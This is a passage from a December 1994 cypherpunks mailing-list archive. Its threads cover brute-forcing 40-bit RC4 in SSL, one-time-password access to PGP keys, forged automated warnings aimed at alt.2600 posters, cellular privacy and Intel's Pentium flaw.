In-Reply-To: <199412122330.PAA29185@netcom20.netcom.com> Message-ID: <199412172149.NAA15954@jobe.shell.portal.com> I notice in the Netscape SSL spec the 40-bit export-approved RC4 key generation is a little more complicated than I would have thought. First a 128 bit "master key" is chosen and 88 bits are revealed, leaving 40 bits secret. Then the RC4 session key is generated as the MD5 hash of this master key plus about 32 bytes of publically known but random information. I'm not clear whether the 128-bit output of the MD5 hash is then used as the RC4 key, or whether only 40 bits are used (and if so, whether there are any public bits in the key besides these 40). If the former, then this extra hash step should really slow down exhaustive search of the key space. If the latter, then it is not clear why the master key is key-size restricted at all since it is not likely to be used in searching the key space. Maybe someone from Netscape could clear up how this is done. Hal From eric at remailer.net Sat Dec 17 14:35:53 1994 From: eric at remailer.net (Eric Hughes) Date: Sat, 17 Dec 94 14:35:53 PST Subject: Time to exhaustively break 40-bit RC4? In-Reply-To: <199412172149.NAA15954@jobe.shell.portal.com> Message-ID: <199412172333.PAA11128@largo.remailer.net> From: Hal I notice in the Netscape SSL spec the 40-bit export-approved RC4 key generation is a little more complicated than I would have thought. [The RC4 key is a hash of the external key. Are 40 or 128 bits of this hash used?] If the former, then this extra hash step should really slow down exhaustive search of the key space. If the latter, then it is not clear why the master key is key-size restricted at all since it is not likely to be used in searching the key space. It doesn't really matter, from a crack designer's point of view. It all depends on what keyspace you're actually searching. You can search either the external key (40 bit) or the internal key (larger). Clearly you have to search the external keyspace. In order to search the external keyspace, you have to simulate the whole algorithm, which in this case is not _just_ RC4 but also preliminary key setup phase. It's just another part of the algorithm. To make the distinction precise, what you're searching is not 40-bit RC4 but rather 40-bit RC4-as-used-in-SSL. The compound algorithm is not identical to the underlying algorithm. This is one of the design problems in Weiner's DES-cracking machine (designed and unbuilt), that it can only crack DES as such and not minor modifications to it. The machine uses a little polynomial generator (similar to using CRC) to be able to partition the keyspace among processors and to keep the pipelines full. This is a hard-wired generator. The architectural improvement needed in a practical machine would be an interconnect for key candidate sequencing. This would add to the cost of the machine, but only by, say, 20% at most. It would be expensive as interconnects go because the bandwidth is so high. Suppose an RC4 cracker existed with the above interconnect. In order to crack RC4-SSL, you'd need a second simulator that did all the hashing and spat keys out its interconnect. Such a front end would have to be designed for every particular configuration used. Eric From eric at remailer.net Sat Dec 17 14:42:55 1994 From: eric at remailer.net (Eric Hughes) Date: Sat, 17 Dec 94 14:42:55 PST Subject: Thoughts on 15 day CJ crypto In-Reply-To: <199412172058.MAA13081@jobe.shell.portal.com> Message-ID: <199412172340.PAA11144@largo.remailer.net> From: Hal Maybe it would be wise when using limited-length session keys to use larger encryption exponents just to confound an exhaustive search of the session key space. It would, but remember that you're generally going to be generating those keys with the application that will be using them eventually. One could write a spoofer, perhaps, to generate you're own keys, but most people won't be using it. I think it is surprising if there is no limitation on encryption exponent size for these exportable key systems, assuming that is the strategy the government is using. Consider the position from the viewpoint of the NSA. Suppose that the hypothesis is correct, and session keys encrypted with short exponents are used to verify candidates. You haven't told anybody this is the reason for the particulars of the restrictions. So, do you, the NSA, write the restriction into the regulation? Or do you rely on the fact that the developer will optimize public keys for speed? The first strategy reveals tactics. The second carries some risk. Eric From sdw at lig.net Sat Dec 17 15:07:41 1994 From: sdw at lig.net (Stephen D. Williams) Date: Sat, 17 Dec 94 15:07:41 PST Subject: "Any of the mailers that you can use on a shell are oxen" In-Reply-To: Message-ID: > > L. Futplex McCarthy wrote: ... > There can be no other lasting solution but to abandon VTwhatever in favor > of bitmaped output devices. Since running X over a dial-up connection is Have you ever done it? It isn't too bad. Especially if you are running well-behaved apps (most are) that aren't too graphical. Really only large images are a problem. Oddly, I've even seen better performance with xterm shells than telnet through a firewall. I haven't even seen the new version of X over slip protocol compression. > rather inefficient, and considering the significant computing power of the > PC's that are now being underused as dumb terminals, processing the data > locally seems to be a sensible solution. > I agree. > > -- Lucky Green > PGP encrypted mail preferred. sdw -- Stephen D. Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/~sdw Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95 OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430 Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94 From cactus at seabsd.hks.net Sat Dec 17 16:33:08 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Sat, 17 Dec 94 16:33:08 PST Subject: QUERY: S/Keyish PGP? Message-ID: <199412180038.TAA03190@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- A quick question: Has anybody considered the possibility of hacking something into PGP's password protection to allow an S/Key like access? IE, I'm sitting here in FL on a 2400 bps modem, telnetted through Netcom's dialup to hks.net, so I'm not bloody likely to be typing my passphrase in and thus am barred from using PGP (without hideous contortions, that is). My questions: - Has anybody done any work on making an S/Key-like mechanism with the assumption that the machine running PGP is (somewhat) secure? This I'm certain is technically possible. More complex: - Has anybody put any thought into a mechanism based upon one-time passwords for regulating PGP private key use on shared, insecure machines (strength == quality of password, of course)? If people could have a widget very much like the Macintosh S/Key widget on their Mac fom which they could cut-n-paste their one time password, it seems like we'd be one step closer to addressing concerns like Tim's. Just a thought... A GUCAPI would make such a mechanism easier, of course (I haven't abandoned the GUCAPI thought: I'm just gestating). - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvOEUSoZzwIn1bdtAQGRSgF8DAt6/1WjmiU3clMy0E+EU4RDmcF0JaGC Y+pNb8dgOzWXEr9b5EyWM0BS4uqw13mK =Xsa9 -----END PGP SIGNATURE----- From adam at bwh.harvard.edu Sat Dec 17 21:16:55 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Sat, 17 Dec 94 21:16:55 PST Subject: QUERY: S/Keyish PGP? In-Reply-To: <199412180038.TAA03190@bb.hks.net> Message-ID: <199412180516.AAA21349@bwh.harvard.edu> | A quick question: Has anybody considered the possibility of hacking | something into PGP's password protection to allow an S/Key like access? I thought of this, bounced it off a few people, none of whom caught the flaw. When I got around to implementing it, I realized that for it to work, your key would have to be securely stored on your unix box without encryption. The way S/key works is it uses your ability to provide the input to a one way function whose expected output S/key knows. There is no secret data stored on the server. In contrast, PGP needs secret data which it uses to encrypt your key while it is stored. Offhand, I doubt it can be done without storing your key in the clear, or trusting the local CPU. If you can store your key in the clear because you feel the comprimise of your key is an acceptable risk, you are all set. Similarly, if you trust the local CPU, you can probably do an encrypted telnet or somesuch. Don't take that to mean it can't be done; I'm not even an amateur cryptographer, and there may well be some clever way of doing this that I haven't thought of. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From jdwilson at gold.chem.hawaii.edu Sat Dec 17 23:13:18 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Sat, 17 Dec 94 23:13:18 PST Subject: FV & PGP (was Re: First Virtual email security) Message-ID: <199412180718.CAA07031@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- On Sat, 17 Dec 1994 nsb at nsb.fv.com wrote: > Once more, with feeling: > > It is NOT an either/or. In the First Virtual system, the credit card > number NEVER GOES OVER THE NET AT ALL, which means that it doesn't go > over the net in the clear AND it doesn't go over the net encrypted. > I got your point from your first response. The remaining 5 were not necessary. I do not continue to question this point. But I might point out that companys doing business on the net might not like having the details of their day to day transactions sniffable, as you can build quite a good business intelligence profile from that type of info. As can the IRS, FBI, etc. Nor would they appreciate being spoofed... I strongly suggest you take another serious consideration of implementing encryption *now* rather than later, as your current scheme is not thorughly protecting the privacy of individuals or organizations until you do. - -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvPiKioZzwIn1bdtAQEBVAGAhjULtzChTtOy5zY0L+kjuzzXXNLfeYAL jJqKiETK5l8GqqGPXr/I+yx3z7PSu3zN =bcUC -----END PGP SIGNATURE----- From rshea at netcom.com Sat Dec 17 23:29:25 1994 From: rshea at netcom.com (rex) Date: Sat, 17 Dec 94 23:29:25 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412150210.SAA05624@netcom7.netcom.com> Message-ID: <8CrykCDmFfp8075yn@netcom.com> In article <199412150210.SAA05624 at netcom7.netcom.com>, you wrote: > > Notice: MPEG-II Video Mail Attached: Quicktime 2.1-compatible. This > messages has been formatted as a HyperMIME document. Do not attempt to > read it on a non-HyperMIME-compliant system. Thanks Tim, I needed that! And thanks also for your insightful, albeit less humorous, posts. -rex PS, just read of your intended departure. Please don't. The list really needs your viewpoint. There are some vocal, abusive, elitists on the list who (IMO) haven't a clue how many people are stuck with less than bleeding edge software, no SLIP access, etc. Without some counterpoint they may totally lose contact with the rest of us. From unicorn at access.digex.net Sun Dec 18 02:01:23 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Sun, 18 Dec 94 02:01:23 PST Subject: Automated Witchhunt: I've been slandered by a script. In-Reply-To: <199412180709.XAA04015@netcom17.netcom.com> Message-ID: On checking my mail early this morning I found this: > Received: from access4.digex.net by nfs1.digex.net with SMTP id AA24362 > (5.67b8/IDA-1.5); Sun, 18 Dec 1994 02:10:05 -0500 > Received: from nfs2.digex.net by access4.digex.net with SMTP id AA23077 > (5.67b8/IDA-1.5); Sun, 18 Dec 1994 02:10:03 -0500 > Received: from netcom17.netcom.com by nfs2.digex.net with SMTP id AA06122 > (5.67b8/IDA-1.5); Sun, 18 Dec 1994 02:10:02 -0500 > Received: by netcom17.netcom.com (8.6.9/Netcom) > id XAA04015; Sat, 17 Dec 1994 23:09:54 -0800 > Date: Sat, 17 Dec 1994 23:09:54 -0800 > Message-Id: <199412180709.XAA04015 at netcom17.netcom.com> > To: unicorn at access.digex.net, cert at cert.org, emmanuel at well.sf.ca.us, > postmaster at access.digex.net, postmaster at access.digex.net > Subject: Re: Police & BBS...Sundevil revisited in Florida > From: unicorn (Black Unicorn) > > If you are not aware of the nature of the group alt.2600, I will explain it. > It is a hacker/cracker newsgroup, containing many illegal messages. A great > deal of its posters ask questions about or give advice on compromising > system security, even that of the system they are on. Phone "phreaking" is > freely discussed, and they explain to each other how to cheat the long > distance telephone carriers. Pirate ftp and fsp sites are often traded by > these people, and you should verify that one has not been set up on your > system, and that the user does not have pirated software in his directory. > Such could get your entire site shut down. Other verified topics that people > explain how to do and admit to doing are disrupting irc, spamming, > mailbombing, shoplifting, disrupting public transportation, and similar > dangerous and illegal mischief. > > This automated message is sent for two reasons: > > 1) To alert you of a potential threat to your system's security, in the > cases of users asking about or being told how to attempt to exploit security > vulnerabilities. Also, the poster may be using a stolen account. > > 2) To alert you that there are crackers on your machine. The account used to > post from may not be legitimate, or may be stolen (it is _extremely_ common > with alt.2600 posters to use fraudulently obtained accounts). Or, a post of > its nature may likely be a violation of terms of a membership agreement. > And, the user making this post may be preparing to break into yours or > another system, if they have not done so already. It is suggested that you > keep a close eye on users who have posted to alt.2600, and to inspect their > files and email if the posting warrants such and you can legally do so. > > All headers and complete text of original message follow: > *************************************************************************** > Xref: netcom.com comp.org.eff.talk:42937 alt.cyberpunk:43019 alt.cyberspace:8271 alt.wired:15428 alt.2600:40781 can.infohighway:2284 alt.pagan:82507 alt.bbs:37526 > Path: netcom.com!ix.netcom.com!howland.reston.ans.net!news1.digex.net!access4!unicorn > From: unicorn at access4.digex.net (Black Unicorn) > Newsgroups: comp.org.eff.talk,alt.cyberpunk,alt.cyberspace,alt.wired,alt.2600,can.infohighway,alt.pagan,alt.bbs > Subject: Re: Police & BBS...Sundevil revisited in Florida > Followup-To: comp.org.eff.talk,alt.cyberpunk,alt.cyberspace,alt.wired,alt.2600,can.infohighway,alt.pagan,alt.bbs > Date: 12 Dec 1994 20:56:36 GMT > Organization: Express Access Online Communications, Greenbelt, MD USA > Lines: 42 > Distribution: inet > Message-ID: <3cide4$e5n at news1.digex.net> > References: <3c94ll$p9t at potogold.rmii.com> > NNTP-Posting-Host: access4.digex.net > X-Newsreader: TIN [version 1.2 PL2] > > Tommy Watt - G.W. Technologies (gwtek at rmii.com) wrote: > : Damn.. . all this reminds me of the bust the local police department did > : on my BBS system.. > > : Under alligations of hacking, they took ALL my computer equipment, > : anything that looked like a computer, anything that couldda been turned > : into a computer, and misc. stuff.. > > : The warrant is pretty much invalid, on the blank where it says "things > : that if found may be seized" is "-- SEE ATTACHMENT 'B'" . . I didnt even > : SEE attachment B, and when I asked for it, they said they dont even have > : to show me this. > > > It's typical to seal this document. > > Unfortunately it's also a tool used for harassment, as you have to go to > a hearing to get the document opened, or looked at by a judge who will > make a determination as to the legitimacy of the sealed materials and > their seizure. > > Guess what the result in your case will be. > (Left as an exercise to the reader.) > > > : This bullshit pisses me off. . . And now they are saying that if > : anything is damaged I can't do shit because my computer equipment was > : "laying out unprotected".. > > Also typical of the type of computer seizures I have seen in past. > > The common practice is to keep the equipment long enough that it's > obsolete when you get it back. Easy to do now-a-days. > > > : Andy Goodwin > > -uni- (Dark) > > -- > 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est > 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! > ** end quotation. ** Obviously, I did not post the portion claiming to be an "automated message" and a warning to whomever will listen. Yet, the post claims to be from me. It seems then that someone is running a process which looks for posts to alt.2600, and then automates the above response, original post attached, to warn off system admins, fight crime, save the day, etc. etc. Either that or Lance is bored again. Does this disturb anyone besides me? Most obviously, the misattributation is concerning. Clearly the threat of misattributed automated posting is merely one more argument for digitally signing each and every message and post. Less obvious, but perhaps more ominous is the concept itself of automated postings that amount to censorship chain letters. "System Administrator A didn't pay attention to this message and refused to snoop into his users directories and three weeks later his system was shut down. System Administrator B headed this letter's warning, and saved his access provider from certain doom!" Look carefully at what this letter says, what it urges system operators to do. 1> Because alt.2600 is occasionally used to trade pirate ftp sites, those who post to alt.2600 are probably pirates. ergo, System Admins. should check the directory of any users who post to alt.2600. If you don't snoop, your system will be shut down. 2> alt.2600 is used to promote shoplifting, and irc disruption. (No relevance is even attempted by the message on this point.) And the purpose of the letter? 1> To alert you that this user is probably posting from a stolen account. That the named user is probably a security risk, a troublemaker, a political dissident, or whatever else comes to mind. 2> "To alert you that there are crackers on your machine." Not that there MAY BE crackers, not that crackers are known to be on alt.2600, and therefore may be on your system, but that crackers ARE ON YOUR MACHINE. If the bald misrepresentation of this statement evades anyone who reads this, I simply give up all hope. 3> That the post may be a violation of the access provider's membership agreement. (As if the automated or manual sender of the message has any idea what the membership agreement of my particular provider might be) 4> The user making this post may be preparing to break into [your machine] or another system, if they have not done so already. 5> To suggest that system admins. "...keep a close eye on users who have posted to alt.2600, and to inspect their files and email [if it's legal]." For those recipients of this message that do not know me, I am an attorney, a member of the D.C. bar, and a law abiding person. The allegation that I, by replying to a message crossposted to alt.2600, am a hacker, a cracker, a shoplifter, a vandal, or whatever other villan of the week you might choose to insert is absurd. The above message constitutes slander, defamation of character, and is entirely untrue in any regard to me other than in so far as it indicates my words might have reached alt.2600 at some time or another. The content of my original quoted message alone should indicate to any reader how absurd the "automated posting"'s allegations are, and demonstrate the pure uselessness of such an approach as of means of accomplishing anything more than to annoy, accuse, threaten, and waste bandwidth. The fact that the automated posting proports to be sent from me almost makes whatever hacking I am supposed to have done seem tame. >From a legal standpoint, the automated posting is entirely lacking in any basis whatsoever for increased scrutiny of my, or any other account address which it slanders. Directing scrutiny to accounts posting at one time or another to "questionable" newsgroups should prompt one to ask one's self about the state of free speech in cyberspace, and increasingly, in this country. What has become of our system that discussion forums, be they on "questionable" topics or not, become probable cause for investigating system users, or rummaging through accounts. I hereby inform the system administrators on my provider, as well as others, that I would consider increased attention to my account, or any other based on this sham of an "automated posting," harassment, invasion without cause, a violation of several electronic privacy acts, and simple witch hunting. Should I come by any indication that such attention is directed to my account, I shall immediately terminate my account with Express Access, and pursue what legal action is available to me to the full extent possible. System administrators would do well to inform themselves of the requirements for intrusion into users accounts, the protections provided those accounts both by statute, and constitution. hile anonymous writings, political speech and literary products have a long and sacred history in the United States, baseless accusations leveled by anonymous finger pointers do not. I find the tactic and tone of this automated posting distasteful and offensive in the extreme. I urge system admins at my, and other providers, to discourage the use of such automated witchhunts, and expose the party/parties responsible for the distribution. I, for one, would be very interested in talking to the individual/s responsible. -uni- (Dark) [unicorn at access.digex.net] 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From dfloyd at io.com Sun Dec 18 02:50:21 1994 From: dfloyd at io.com (dfloyd at io.com) Date: Sun, 18 Dec 94 02:50:21 PST Subject: alt.2600 spam Message-ID: <199412181050.EAA23590@pentagon.io.com> -----BEGIN PGP SIGNED MESSAGE----- [Post deleted about auto-reply to one's system adminstrator if (s)he posts on alt.2600 by Black Unicorn] FWIW, the person doing that crud on Netcom has had his/her account yanked permanently. (note new PGP key...) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLvQTJ1LUeLjqSiixAQFJugf+L3Ri8JGMYJ9Mwn1O+mVbR4Hwz4l1grpV KfhBg46jjlypQ4/9SGn+OsEq9JVb2nF4VySzbsS2hV4RW42WIMkv4F23AqDVbusT 1L7dxZIGC8MZB+XdYMHTxf7AaNmSfyTzSHxGPWhVyvaC8D6+DKmrpZS0Md/lqdiF zG/MQgOkwfln0MDk1D3UN6ExUz+HkSFHvd4jGtNQtP4ufps404MTEuCbFPc36bqY V+btOmzDJs4gwGaXk0Bmal59xYaygn3CWlbNM5zOhS1IjShLEo3Re9/Yb7U25Fr+ /Qxg5kd084CE5svclXKxG/963UKQHY1ovv7kfATMIMF37M0mT1lpBw== =pDsV -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Sun Dec 18 03:13:51 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Sun, 18 Dec 94 03:13:51 PST Subject: Kibo recommends PGP to Bob Rae (fwd) Message-ID: <199412181118.GAA08711@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- For those who don't know, Kibo is a fairly famous Usenet personality. I've no idea whether he uses PGP, but it's encouraging to see him recommending it to Bob Rae.... - - -L. Futplex McCarthy Forwarded article: > Newsgroups: ont.general,alt.religion.kibology > From: kibo at world.std.com (James "Kibo" Parry) > Subject: Re: Thanks > Message-ID: > References: <1994Dec9.222452.21478 at govonca.gov.on.ca> > Date: Wed, 14 Dec 1994 15:28:02 GMT > > [ont.general] > In <1994Dec9.222452.21478 at govonca.gov.on.ca> premier at govonca.gov.on.ca (Premier of Ontario) writes: > > Many thanks to those of you who flamed the PC pranksters. I knew > > when I went online that I would have to deal with fake posts and related > > chaff. > > Might I suggest looking into using a PGP signature to prevent this from > happening again? [...] - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvQZVGf7YYibNzjpAQEsUgQA1Nm6MZtxFub2lvx3QE70sht2dQyvR9iC 1PXdNhImVm5/Wlu6+xJbEQBIBB229+F4NOrs8E4T9f5/ZjEyZQnW9AsRQ4KQwThz ShUAf//6RIOcOWj9qc5YZWjAXxFaaq9nud7bAbZ+sTwiw+2/5y1lZSWhcF8nfeXw UesP86rCjKw= =oNiJ - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvQahyoZzwIn1bdtAQGuugGAmrWYvSpkE9IGBm9+DrxU4Mn0XKPT5ovm D+3A6cSINGhiEY2EAg/YV0RUxXYMz2yY =30UW -----END PGP SIGNATURE----- From bryce at cybernet.co.nz Sun Dec 18 04:07:02 1994 From: bryce at cybernet.co.nz (Bryce Boland) Date: Sun, 18 Dec 94 04:07:02 PST Subject: No Subject Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >Well thats 2 replys, Man it`s going to be packed! :) > >When a meeting happens what do we discuss?/do? > - an obvious one would be NZ crypto! > - New crypto ideas? > - NZ Anon remailers & Repositorys > - Patents??? (maybe not) > - Cryptanalasis (Hopefully, oh please-oh please) We haven't heard from Peter Gutmann yet (probably because he is so busy), but if he turns up it would be interesting to hear about any future plans for SFS. I don't mind explaining a little bit about some areas of cryptanalysis, maybe the various sieves. Chris might want to talk about some hardware ideas. >PS: Why do we need a workstation? (probably a dumb question) To try stuff out, play with programs, broadcast the nonsense worldwide over the net ... We don't need one, we just need people who have a common interest and something to say about it. -----BEGIN PGP SIGNATURE----- Version: 2.6 Comment: Please note my current address is bryce at cybernet.co.nz iQCVAwUBLvJtYtXxuu4HpwwBAQF9PgP/ZLORHZjtNqchFHZSuhHfqQIFqrfdJIyI C7J7jCSnpt8cEqdZKJf2xSU6oeITg8oL388KwqY+O0em2O0QyiWqNZZcv4oJItFs 4R/lECvtrO9a5YbNyT4tgzFXWM2muULoYbSog2FhUlFOkNAfwRaJCqIghQceOrzF apRh15/AH1I= =3/2q -----END PGP SIGNATURE----- ------------------------------------------------------------------------------- Bryce Boland Finger for PGP Public Key From entropy at IntNet.net Sun Dec 18 07:08:10 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Sun, 18 Dec 94 07:08:10 PST Subject: Cellular Privacy [Digital vs. Analog] In-Reply-To: <9412161623.AA23186@chaos.intercon.com> Message-ID: > Well, it is true, from a pragmatic point of view. A neighborhood kid with a > Radio Shack scanner can't listen in on digital cellular calls. You have to > actually hack a phone, which is a much less prevalent skill. True. And the fact is, monitoring any _one specific call_ is rather difficult to do without specialized equipment - in my experience with modified analog phones, one has to hop between 50 cells at the minimum before they can hope to monitor a specific call. I've yet to obtain a digital cellphone to modify, but with the recent legislation about cellular phone monitoring, I wouldn't be surprised if it were more difficult to hack them. (and just from the size of them alone, I would guess that they're mostly surface-mount, which is a pain in the arse for most people without elaborate facilities) > I still think that CDMA+DES is the way to go for secure cellular, but from a > purely pragmatic point of view simply going digital does increase privacy. > Using analog cellular is like using a walkie-talkie. Good analogy. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) From entropy at IntNet.net Sun Dec 18 07:21:07 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Sun, 18 Dec 94 07:21:07 PST Subject: Automated Witchhunt: I've been slandered by a script. In-Reply-To: Message-ID: > Obviously, I did not post the portion claiming to be an "automated > message" and a warning to whomever will listen. Yet, the post claims to > be from me. I have recieved a pair of similar messages; I found it quite irritating. The message is apparently from rcalasso at netcom.com, with pointers to ghoast at gnu.ai.mit.edu. > Does this disturb anyone besides me? Yes. It irritates the shit out of me, to put it bluntly. I didn't post anything remotely insecure, but how am I to know that my admins will even read the text of my message? I don't want my account-space searched, even though I'm not worried about anything being found - it's a matter of principle. > very interested in talking to the individual/s responsible. Addresses are above. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) From jya at pipeline.com Sun Dec 18 08:04:40 1994 From: jya at pipeline.com (John Young) Date: Sun, 18 Dec 94 08:04:40 PST Subject: NYT on Pentium Message-ID: <199412181603.LAA25292@pipe1.pipeline.com> John Markoff writes today on Intel's mishandling of the Pentium flaw. Mr. T May quoted. For email copy send blank message with subject: 585_999 Here are few excerpts: In recent weeks, evoking memories of Richard Nixon at the height of the Watergate crisis, Mr. Grove has retreated to his "war room" inside the company's corporate headquarters in Santa Clara. *** 'Righteousness' How did a sporadic arithmetic error that was not detected for months, in the chip that Intel insists is its most heavily tested microprocessor in history, become the heart of such a debacle? The answer is rooted in Intel's distinctive corporate culture, and suggests that Intel went wrong in much the same way as other big and unresponsive companies before it. Intel has traditionally valued engineering over product marketing. Inward-looking and wary of competitors (from experience with the Japanese), it developed a bunker mentality, a go-for-the-jugular attitude and a reputation for arrogance. "There are certain elements in Intel's culture, and one is righteousness," said Federico Faggin, a former Intel engineer and co-inventor of its first microprocessor. "The attitude at Intel is, 'We're better than everyone else and what we do is right and we never make mistakes.' " *** But the technologist's mind-set did little to prepare Intel for the consumer marketplace. Although it spent hundreds of millions of dollars on its "Intel Inside" and Pentium ad campaigns, the consumer-oriented strategy unraveled last month when Mr. Grove dismissed customers' requests for chips to replace the Pentium. *** "What Intel clearly should have done is issued a bug report as soon as they found out it was a reproducible problem," said Timothy May, a former Intel semiconductor engineer. "Instead, by keeping it mum, they backed themselves into a corner." But although he has issued a public apology for the flaw, Mr. Grove has been unwilling to personally come forward in an effort to restore customer confidence. "The test of a great company is in how they handle disasters," said James F. Moore, head of Geopartners, a high-tech consulting firm. "This is one where you can't behave like a paranoid. This is one where only the compassionate survive." From eggo at student.umass.edu Sun Dec 18 09:02:41 1994 From: eggo at student.umass.edu (Round Waffle) Date: Sun, 18 Dec 94 09:02:41 PST Subject: alt.2600 spam In-Reply-To: <199412181050.EAA23590@pentagon.io.com> Message-ID: <199412181702.MAA01421@twain.ucs.umass.edu> > [Post deleted about auto-reply to one's system adminstrator if (s)he > posts on alt.2600 by Black Unicorn] > > FWIW, the person doing that crud on Netcom has had his/her account > yanked permanently. > Well, actually, it has begun again. Apparently either it is being done with cracked accounts, or someone is distributing the script around, since the original messages came from pbergman at netcom.com, while the latest batch (I got 3 this morning), came from a different netcom user. (Apologies for not having a name, I misplaced the posts.) It's safe to say that this second wave is just an "annoyance" one, as one of the people listed in the headers of the mail is emmanuel at well.sf.ca.us, the editor of 2600. Thus, I think this is more for harassment of him than for any kind of serious attempt to have peoples' accounts rifled. ObCrypto: How long until someone decides that anyone who posts to alt.security.pgp is obviously a spy/kiddie porn collector/secretive serial killer/UNABOMer/etc., and takes it upon themselves to notify half a dozen people of such? > (note new PGP key...) > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQEVAwUBLvQTJ1LUeLjqSiixAQFJugf+L3Ri8JGMYJ9Mwn1O+mVbR4Hwz4l1grpV > KfhBg46jjlypQ4/9SGn+OsEq9JVb2nF4VySzbsS2hV4RW42WIMkv4F23AqDVbusT > 1L7dxZIGC8MZB+XdYMHTxf7AaNmSfyTzSHxGPWhVyvaC8D6+DKmrpZS0Md/lqdiF > zG/MQgOkwfln0MDk1D3UN6ExUz+HkSFHvd4jGtNQtP4ufps404MTEuCbFPc36bqY > V+btOmzDJs4gwGaXk0Bmal59xYaygn3CWlbNM5zOhS1IjShLEo3Re9/Yb7U25Fr+ > /Qxg5kd084CE5svclXKxG/963UKQHY1ovv7kfATMIMF37M0mT1lpBw== > =pDsV > -----END PGP SIGNATURE----- > +- eggo at student.umass.edu --><-- Eat Some Paste -+ +- Yorn desh born, der ritt de gitt der gue, -+ +- Orn desh, dee born desh, de umn bork! bork! bork! -+ +----------------- The Durex Blender Corporation ----------------+ From warrior at infinet.com Sun Dec 18 10:05:07 1994 From: warrior at infinet.com (warrior) Date: Sun, 18 Dec 94 10:05:07 PST Subject: Automated Witchhunt: I've been slandered by a script. In-Reply-To: Message-ID: Perhaps this is a prime time to sign all messages, and use hpack to protect those unix files and directories from prying eyes. I am still trying to figure out how to set up PGPsendmail or AutoPGP or connect PGP to some mail program so this can be done automatically. I would appreciate any help offerred. Meanwhile, what can you do other than swamp their sysadmin with complaints, forward their antics to CERT, as they have done? Regards, Dave On Sun, 18 Dec 1994, Jonathan Cooper wrote: > Yes. It irritates the shit out of me, to put it bluntly. I didn't > post anything remotely insecure, but how am I to know that my admins will > even read the text of my message? I don't want my account-space > searched, even though I'm not worried about anything being found - it's a > matter of principle. > -jon > ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) > ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ___ /\ PGP the Cutting Edge of Privacy /vvvvvvvvvvvv \-------------------------------------\ | WARRIOR ( |PGP Key Id 0X71FADEAD > Veritas Vincit `^^^^^^^^^^^^ /=====================================/ \/ Finger for PGP 2.6.2 public Key. PGP Fingerprint 59 BB DD BC BA E6 C7 77 34 81 09 92 62 6C 74 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= | Dave M. Harvey warrior at infinet.com| | PO Box 151311 dharvey at freenet.columbus.oh.us| | Columbus, OH 43215-8311 fm063 at cleveland.freenet.edu| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From pgut01 at cs.aukuni.ac.nz Sun Dec 18 11:10:18 1994 From: pgut01 at cs.aukuni.ac.nz (Peter Claus Gutmann) Date: Sun, 18 Dec 94 11:10:18 PST Subject: No Subject Message-ID: <9412181909.AA13029@cs7.cs.aukuni.ac.nz> >We haven't heard from Peter Gutmann yet (probably because he is so busy), but >if he turns 